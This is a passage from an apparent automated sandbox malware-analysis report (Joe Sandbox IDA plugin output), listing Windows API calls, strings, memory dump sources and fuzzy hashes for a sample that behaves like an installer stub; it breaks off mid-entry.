                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDeviceEnumFontsRelease
                                                                              • String ID:
                                                                              • API String ID: 2698912916-0
                                                                              • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                              • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                              • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                              • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                              APIs
                                                                              • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,023AC268,00003D94,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                              • String ID:
                                                                              • API String ID: 730355536-0
                                                                              • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                              • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                              • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                              • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                              APIs
                                                                                • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C192,00000000,0045C31D,?,00000000,00000002,00000002), ref: 00450933
                                                                              • FlushFileBuffers.KERNEL32(?), ref: 0045C2E9
                                                                              Strings
                                                                              • EndOffset range exceeded, xrefs: 0045C21D
                                                                              • NumRecs range exceeded, xrefs: 0045C1E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: File$BuffersFlush
                                                                              • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                              • API String ID: 3593489403-659731555
                                                                              • Opcode ID: 8bf98c9d60884cf3bb303afe6a2d902a3b8c4cda653ee0cbd8c8d24135a36091
                                                                              • Instruction ID: 054e4d8252a4b7fe708e1d13fc1942b3136e6dcde41ac9beef610e5760cb7d56
                                                                              • Opcode Fuzzy Hash: 8bf98c9d60884cf3bb303afe6a2d902a3b8c4cda653ee0cbd8c8d24135a36091
                                                                              • Instruction Fuzzy Hash: D3615434A002588FDB25DF25D881AD9B7B5AF49305F0084DAED89AB353D774AEC8CF54
                                                                              APIs
                                                                                • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498726), ref: 0040334B
                                                                                • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498726), ref: 00403356
                                                                                • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498730), ref: 00406322
                                                                                • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498730), ref: 00406366
                                                                                • Part of subcall function 004063C4: 6F541CD0.COMCTL32(00498735), ref: 004063C4
                                                                                • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                • Part of subcall function 00419040: GetVersion.KERNEL32(0049874E), ref: 00419040
                                                                                • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498762), ref: 0044F77F
                                                                                • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498767), ref: 0044FC1F
                                                                                • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498776), ref: 00453210
                                                                                • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498776), ref: 0045322A
                                                                                • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                • Part of subcall function 00456F00: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F24
                                                                                • Part of subcall function 00464468: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049878A), ref: 00464477
                                                                                • Part of subcall function 00464468: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 0046447D
                                                                                • Part of subcall function 0046CC64: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC79
                                                                                • Part of subcall function 00478740: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498794), ref: 00478746
                                                                                • Part of subcall function 00478740: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478753
                                                                                • Part of subcall function 00478740: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478763
                                                                                • Part of subcall function 00483A6C: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00483B5B
                                                                                • Part of subcall function 00495724: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049573D
                                                                              • SetErrorMode.KERNEL32(00000001,00000000,004987DC), ref: 004987AE
                                                                                • Part of subcall function 004984D8: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004987B8,00000001,00000000,004987DC), ref: 004984E2
                                                                                • Part of subcall function 004984D8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004984E8
                                                                                • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                              • ShowWindow.USER32(?,00000005,00000000,004987DC), ref: 0049880F
                                                                                • Part of subcall function 004820AC: SetActiveWindow.USER32(?), ref: 0048215A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF541FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                              • String ID: Setup
                                                                              • API String ID: 291738113-3839654196
                                                                              • Opcode ID: 4026870168645be20c4e504289bca16f7fc9894158eff1610b8fe089479f565d
                                                                              • Instruction ID: 72ad643eee306aeb53380572695708c68149a0501138caf3355f256a6ce1e3ac
                                                                              • Opcode Fuzzy Hash: 4026870168645be20c4e504289bca16f7fc9894158eff1610b8fe089479f565d
                                                                              • Instruction Fuzzy Hash: 7931C5712046409ED705BBBBAC5392D3B94EF8A728BA2447FF80486593DE3C58508A7F
                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: .tmp
                                                                              • API String ID: 1375471231-2986845003
                                                                              • Opcode ID: 7172d9ffade96b62561a832a68f8cbe161be4b5cae50dfb87ffdb02f7c338e4f
                                                                              • Instruction ID: ea6adcadec8e2c01cafa1ba510acc1338588d6ec7b4e1cf88163bb5bfef62d35
                                                                              • Opcode Fuzzy Hash: 7172d9ffade96b62561a832a68f8cbe161be4b5cae50dfb87ffdb02f7c338e4f
                                                                              • Instruction Fuzzy Hash: A9213575A002089BDB01EFA1C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                              APIs
                                                                                • Part of subcall function 00483560: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483571
                                                                                • Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048357E
                                                                                • Part of subcall function 00483560: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358C
                                                                                • Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483594
                                                                                • Part of subcall function 00483560: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 004835A0
                                                                                • Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 004835C1
                                                                                • Part of subcall function 00483560: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004835D4
                                                                                • Part of subcall function 00483560: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004835DA
                                                                                • Part of subcall function 0048388C: GetVersionExA.KERNEL32(?,00483A9E,00000000,00483B73,?,?,?,?,?,00498799), ref: 0048389A
                                                                                • Part of subcall function 0048388C: GetVersionExA.KERNEL32(0000009C,?,00483A9E,00000000,00483B73,?,?,?,?,?,00498799), ref: 004838EC
                                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00483B5B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                              • String ID: SHGetKnownFolderPath$shell32.dll
                                                                              • API String ID: 3869789854-2936008475
                                                                              • Opcode ID: 36bbd7205677a14235ded179242f98fe4396733ea939f399f849956901c26b03
                                                                              • Instruction ID: 33d3db6593e9873a674f830e342c1c65c6cab746408e9d399a43700aa418428b
                                                                              • Opcode Fuzzy Hash: 36bbd7205677a14235ded179242f98fe4396733ea939f399f849956901c26b03
                                                                              • Instruction Fuzzy Hash: 672100B06503516EC300BF7E59A661A3BA5EB5474C380893FF804EB3D2D77E68145BAE
                                                                              APIs
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C41C,00000000,0047C432), ref: 0047C12A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID: RegisteredOrganization$RegisteredOwner
                                                                              • API String ID: 3535843008-1113070880
                                                                              • Opcode ID: 0e90ec8331aa68b80fdbd6afaabfad8867ded4c3b6cad332e65b349247218e2d
                                                                              • Instruction ID: 6af266579ce0f4cae339b7a6725c06c490679c1ac7d4d5cc7f46b4f942b6f465
                                                                              • Opcode Fuzzy Hash: 0e90ec8331aa68b80fdbd6afaabfad8867ded4c3b6cad332e65b349247218e2d
                                                                              • Instruction Fuzzy Hash: 32F0B430704244AFDB04DAA8EDD2BAA776AD741304FA4803FE1048F382D679DE019BAC
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004752F7), ref: 004750E5
                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004752F7), ref: 004750FC
                                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15,00000000), ref: 0045349F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateErrorFileHandleLast
                                                                              • String ID: CreateFile
                                                                              • API String ID: 2528220319-823142352
                                                                              • Opcode ID: bbf61bf67fe349c097a8a02b07410db95704594b340b54041ead5b805cfa0960
                                                                              • Instruction ID: 6399d4087dc53d24fa9d3bc8bb06fd86b45c214eecae9240140a798b65cacfb0
                                                                              • Opcode Fuzzy Hash: bbf61bf67fe349c097a8a02b07410db95704594b340b54041ead5b805cfa0960
                                                                              • Instruction Fuzzy Hash: 18E06D302407447BEA10FA69CCC6F4A77989B04768F10C162FA48AF3E2C5B9EC408658
                                                                              APIs
                                                                                • Part of subcall function 00456E90: CoInitialize.OLE32(00000000), ref: 00456E96
                                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                              • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F24
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                              • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                              • API String ID: 2906209438-2320870614
                                                                              • Opcode ID: 3ee7a517847f468c0619dab237ccb69dbf9a8b231eaadc82d937c3bc473404de
                                                                              • Instruction ID: 06a1b1eafb8ede6a4ef061af05be88198505768e1dcfa776260a5a664dfb1d55
                                                                              • Opcode Fuzzy Hash: 3ee7a517847f468c0619dab237ccb69dbf9a8b231eaadc82d937c3bc473404de
                                                                              • Instruction Fuzzy Hash: BBC04CA1F5271156CA00BBFA655361F2805DB5031FBD2803FB948A7587CE7C9C095B6E
                                                                              APIs
                                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                              • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC79
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorLibraryLoadModeProc
                                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                              • API String ID: 2492108670-2683653824
                                                                              • Opcode ID: 86cf81fee744bb21f40f36152ca0a59654e50c5ee39d1ae44c17eff86845b0ac
                                                                              • Instruction ID: d379c4162c5a45317e257a8b9368072ef34678a45322f04a033aff34d3fd6743
                                                                              • Opcode Fuzzy Hash: 86cf81fee744bb21f40f36152ca0a59654e50c5ee39d1ae44c17eff86845b0ac
                                                                              • Instruction Fuzzy Hash: 4BB092A06027018ADB00F7F258A662B28099B40319B20803B71889B685EE3C88004BAF
                                                                              APIs
                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID:
                                                                              • API String ID: 2574300362-0
                                                                              • Opcode ID: c059e024c9e6eb8416f72924d9350c7e8f021855cc9b01300ad62ba4517ae118
                                                                              • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                              • Opcode Fuzzy Hash: c059e024c9e6eb8416f72924d9350c7e8f021855cc9b01300ad62ba4517ae118
                                                                              • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                              APIs
                                                                              • GetSystemMenu.USER32(00000000,00000000,00000000,00481898), ref: 00481830
                                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481841
                                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481859
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Append$System
                                                                              • String ID:
                                                                              • API String ID: 1489644407-0
                                                                              • Opcode ID: d933746ff7b66401e606975732ccc260a02719cdd81df1f2e9532199b1c22675
                                                                              • Instruction ID: 2579a7d5db53e33ee4863251c1290a2b13440539eb68b17f0e677d1311332c65
                                                                              • Opcode Fuzzy Hash: d933746ff7b66401e606975732ccc260a02719cdd81df1f2e9532199b1c22675
                                                                              • Instruction Fuzzy Hash: A131A3307043445AD721BB769C83B6E3B989F55718F54587FF8009A2E3CA7C9D0A879D
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0044B401
                                                                              • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                              • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectReleaseSelect
                                                                              • String ID:
                                                                              • API String ID: 1831053106-0
                                                                              • Opcode ID: 71686dd1bf2aceb477ce3f8db4b541325f82ff5bc32dc74031120fde16d0cea8
                                                                              • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                              • Opcode Fuzzy Hash: 71686dd1bf2aceb477ce3f8db4b541325f82ff5bc32dc74031120fde16d0cea8
                                                                              • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,004820C7,?,?), ref: 0044B11E
                                                                              • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                              • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DrawText$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 65125430-0
                                                                              • Opcode ID: 48900d8d8fc19135f8d19aada3e9e9d8d34cb92564939e70bb5bc2663f887e99
